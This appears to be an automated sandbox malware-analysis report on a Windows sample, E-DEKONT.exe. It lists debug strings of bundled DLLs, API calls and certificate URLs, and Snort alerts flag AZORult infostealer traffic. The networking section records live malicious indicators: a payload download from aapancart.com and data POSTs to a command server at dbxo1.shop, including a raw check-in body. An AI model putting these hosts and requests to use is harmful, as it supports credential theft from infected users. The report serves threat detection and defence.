Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108884231351.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943979243.000000001E774000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908823587.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108908941995.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108892004613.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108891891978.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108909446480.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108887027855.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108886923210.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939672315.000000001E714000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889973154.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862

Networking

barindex
Source: Traffic Snort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49852 -> 104.21.44.194:80
Source: Traffic Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 104.21.44.194:80 -> 192.168.11.20:49852
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aapancart.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo1.shopContent-Length: 41815Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: E-DEKONT.exe, 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://LOGIN.LIVE.COM/
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108827106899.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108827106899.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
